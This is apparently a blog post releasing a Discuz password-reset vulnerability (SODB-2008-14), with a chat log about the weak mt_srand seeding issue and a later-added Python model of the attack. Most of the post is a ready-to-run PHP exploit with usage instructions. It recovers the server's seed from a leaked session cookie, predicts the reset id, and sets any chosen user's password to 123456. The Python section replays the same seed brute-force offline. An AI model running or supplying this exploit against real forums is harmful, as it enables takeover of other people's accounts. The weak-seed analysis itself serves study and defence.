Posted by Superhei
To celebrate mjj finally getting xx'd, and to cheer on Daoge's performance tomorrow, SODB-2008-14 is released today. The detailed analysis is not published yet; anyone interested can go and analyse it first. The vulnerability exploits the mt_srand()/srand() weak seeding problem found by se (Stefan Esser); a lot of other web applications are probably affected by it too. There is also a small piece of gossip: back when se wrote about this problem on his blog, I asked the dz (Discuz) security people about it, and unfortunately he told me they had patched it n years ago:
SuperHei says:
Does dz have the mt_srand vulnerability?
******* says:
Patched back in '06.
SuperHei says:
Oh? How was it patched?
******* says:
Haha
******* says:
It's written in the PHP manual.
SuperHei says:
How is it written?
******* says:
Look it up yourself.
******* says:
Don't assume foreigners are always ahead.
SuperHei says:
....
SuperHei says:
Tell me how you patched it.
SuperHei says:
Skip the nonsense first.
******* says:
Not telling.
SuperHei says:
Forget it then, heh.
SuperHei says:
Pretend I never said anything.
******* says:
You see what the foreigners are doing, then come and dig through domestic programs.
******* says:
Haha
SuperHei says:
Yeah, that's the only level I'm at, nothing to be done.
******* says:
- -
******* says:
The mt_srand thing is explained in the PHP manual, so on newer PHP versions there is no need to seed any more. We also enlarged the value space, so it's basically impossible to hit by chance.
SuperHei says:
Heh.
Exploit:
```php
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
Discuz! Reset User Password Exploit
by 80vul
team: http://www.80vul.com
+---------------------------------------------------------------------------+
');
if ($argc < 6) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user mail uid
host: target server (ip/hostname)
path: path to discuz
user: user login name
mail: user login mail
uid: user login id
Example:
php '.$argv[0].' localhost /discuz/ 80vul 80vul@80vul.com 2
+---------------------------------------------------------------------------+
');
    exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$mail = $argv[4];
$uid  = $argv[5];

// Step 1: GET any page and pull the anti-CSRF formhash out of it.
$fp = fsockopen($host, 80);
if (!$fp)
    exit("Connect Failed!\n");
$data  = "GET ".$path."viewthread.php HTTP/1.1\r\n";
$data .= "Host: $host\r\n";
$data .= "Keep-Alive: 300\r\n";
$data .= "Connection: keep-alive\r\n\r\n";
fputs($fp, $data);
$resp = '';
$hash = array();
while ($fp && !feof($fp)) {
    $resp .= fread($fp, 1024);
    preg_match('/&formhash=([a-z0-9]{8})/', $resp, $hash);
    if ($hash)
        break;
}
if ($hash) {
    // Step 2: ask for a password reset for the victim. The reply's Set-Cookie
    // carries a 6-char sid drawn from the same weakly seeded mt_rand() stream
    // that the reset id is drawn from, so it leaks the seed.
    $cmd = 'action=lostpasswd&username='.urlencode($user).'&email='.urlencode($mail).'&lostpwsubmit=true&formhash='.$hash[1];
    $data  = "POST ".$path."member.php HTTP/1.1\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Referer: http://$host$path\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Content-Length: ".strlen($cmd)."\r\n";
    $data .= "Connection: close\r\n\r\n";
    $data .= $cmd;
    fputs($fp, $data);
    $resp = '';
    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);
    fclose($fp);
    $sid = array();
    preg_match('/Set-Cookie:\s[a-zA-Z0-9]+_sid=([a-zA-Z0-9]{6});/', $resp, $sid);
    if (!$sid)
        exit("Exploit Failed!\n");
    // Step 3: brute-force the seed from the sid, then replay the server's draws:
    // sid = random(6), one extra mt_rand(), then the reset id = random(6).
    $seed = getseed();
    if ($seed) {
        mt_srand($seed);
        random();
        mt_rand();
        $id = random();
        // Submit the predicted id together with a new password for the victim.
        $fp = fsockopen($host, 80);
        if (!$fp)
            exit("Connect Failed!\n");
        $cmd = 'action=getpasswd&uid='.$uid.'&id='.$id.'&newpasswd1=123456&newpasswd2=123456&getpwsubmit=true&formhash='.$hash[1];
        $data  = "POST ".$path."member.php HTTP/1.1\r\n";
        $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $data .= "Referer: http://$host$path\r\n";
        $data .= "Host: $host\r\n";
        $data .= "Content-Length: ".strlen($cmd)."\r\n";
        $data .= "Connection: close\r\n\r\n";
        $data .= $cmd;
        fputs($fp, $data);
        $resp = '';
        while ($fp && !feof($fp))
            $resp .= fread($fp, 1024);
        fclose($fp);
        // Discuz's "your password has been reset, please log in with the new password" message.
        if (strpos($resp, '您的密码已重新设置,请使用新密码登录。') !== false)
            exit("Exploit Success!\nUser New Password:\t123456\n");
        else
            exit("Exploit Failed!\n");
    } else
        exit("Exploit Failed!\n");
} else
    exit("Exploit Failed!\n");

// Try every seed in [0, 1000000] until the local mt_rand() stream reproduces the
// leaked sid. Note: PHP 7.1 changed mt_srand()/mt_rand() (the reload bug and the
// range scaling were fixed), so this search has to run on the same PHP major
// version as the target, or the locally generated tokens will not line up.
function getseed()
{
    global $sid;
    for ($seed = 0; $seed <= 1000000; $seed ++) {
        mt_srand($seed);
        $id = random(6);
        // Strict comparison: with == PHP would also accept numerically equal
        // strings such as "0e1234" and "000000" and return a wrong seed.
        if ($id === $sid[1])
            return $seed;
    }
    return false;
}

// Same alphabet and loop as the Discuz random(); it must be replicated exactly
// for the replay above to line up with the server's draws.
function random($length = 6)
{
    $hash = '';
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
    $max = strlen($chars) - 1;
    for ($i = 0; $i < $length; $i ++)
        $hash .= $chars[mt_rand(0, $max)];
    return $hash;
}
?>
```
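As an added example (not the 80vul exploit and not Discuz code), the attack chain the exploit above replays, modelled in Python so that it runs offline: the server seeds once with a small integer, hands out a 6-character sid, burns one draw, then makes the reset id; the attacker brute-forces the seed from the sid and replays the draws. Python's random.Random is used as the MT19937 core, so its seeding and range scaling differ from PHP's mt_srand()/mt_rand() and the concrete strings will not match a real PHP target (the exploit above is the faithful replay). The point it demonstrates is the one behind the chat above: however large the token's alphabet, a token computed from a seed bounded by 1,000,000 carries at most about 20 bits and falls to a linear search. The server model, the seed 314159, the "% len(CHARS)" scaling and the 1,000,000 bound are assumptions taken from the exploit's search loop and alphabet, not from the page.

```python
"""Seed recovery against a weakly seeded MT19937 token generator.

Added example; not the 80vul exploit and not Discuz code. Python's
random.Random stands in for PHP's mt_srand()/mt_rand(); its seeding and
range scaling differ from PHP's, so the strings differ from a PHP target.
"""
import random
import secrets

# Same 62-character alphabet as the Discuz random() in the exploit.
CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz"
# The exploit's search bound; assumed to come from a microtime()-style seed.
MAX_SEED = 1_000_000


class WeakTokenSource:
    """Model of a generator seeded once with a small integer (assumption)."""

    def __init__(self, seed):
        # Stands in for mt_srand($seed); Python's seeding differs from PHP's.
        self._rng = random.Random(seed)

    def mt_rand(self):
        # Stands in for mt_rand(): one 32-bit MT19937 output.
        return self._rng.getrandbits(32)

    def random(self, length=6):
        # Mirrors the exploit's random(); "% len(CHARS)" is a simplification
        # of PHP's mt_rand(0, $max) scaling.
        return "".join(CHARS[self.mt_rand() % len(CHARS)] for _ in range(length))


def server_lostpasswd(seed):
    """Constructed model of the server side in the order the exploit replays it."""
    src = WeakTokenSource(seed)
    sid = src.random(6)        # leaks in "Set-Cookie: xxx_sid="
    src.mt_rand()              # the one draw the exploit skips with mt_rand()
    reset_id = src.random(6)   # the id the reset e-mail would carry
    return sid, reset_id


def recover_seed(sid, max_seed=MAX_SEED):
    """Attacker step 1: the seed whose first six draws reproduce the leaked sid."""
    for seed in range(max_seed + 1):
        # Exact string comparison, unlike PHP's == which also accepts
        # numerically equal strings such as "0e1234" == "000000".
        if WeakTokenSource(seed).random(6) == sid:
            return seed
    return None


def predict_reset_id(sid, max_seed=MAX_SEED):
    """Attacker step 2: replay the server's draws from the recovered seed."""
    seed = recover_seed(sid, max_seed)
    if seed is None:
        return None
    src = WeakTokenSource(seed)
    src.random(6)   # the sid
    src.mt_rand()   # the skipped draw
    return src.random(6)


def hardened_token(length=6):
    """What the reset id should be: drawn from the OS CSPRNG, so there is no seed to search."""
    return "".join(secrets.choice(CHARS) for _ in range(length))


if __name__ == "__main__":
    sid, real_id = server_lostpasswd(314159)   # constructed server seed
    print("leaked sid:", sid)
    print("predicted id:", predict_reset_id(sid), "actual id:", real_id)
    print("hardened id:", hardened_token())
```

Run stand-alone it prints the leaked sid and a predicted reset id equal to the one the model server generated; the linear search over a few hundred thousand seeds takes a couple of seconds in Python. hardened_token() is the contrast: six characters drawn from secrets have the full 62^6 space because nothing small seeds them.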
